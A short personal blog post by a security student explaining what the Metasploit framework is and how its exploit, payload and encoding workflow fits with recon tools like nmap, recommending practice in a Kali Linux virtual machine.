As I continue gaining experience in my virtual lab and reading of how to conduct countless exploits a tool used in nearly every scenario is Metasploit. I figured it is important to know exactly what this tool is, what it does, how it’s made, etc…
- Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
- Optionally checking whether the intended target system is susceptible to the chosen exploit;
- Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server);
- Choosing the encoding technique so that the intrusion-prevention system (IPS) ignores the encoded payload;
- Executing the exploit.-wikipedia
In order to conduct these steps some information is needed. This is where recon tools come in such as nmap. Common information that is needed is the operation system version as well as installed network services. We can then use our vulnerability scanner of choice to detect vulnerabilities on our target system. Metasploit is capable of having the vulnerability scanner’s data imported to the Framework to identify those with existing exploit modules.
You may be wondering about the list of exploits the tool contains. Well the list typically contains most if not all of the common exploits however developers are also capable of creating their own exploits and publishing them to the tool via github.
Metasploit is definitely a great tool and being that this tool is so popular it is important for both red team(attacker) and blue team(defenders) personnel to understand it and what it contains. I highly recommend all people interested in security to at least research this tool and run it in a vm environment such as kali linux which comes with metasploit pre-installed. It is truly amazing how simple this tool can make exploiting a vulnerability.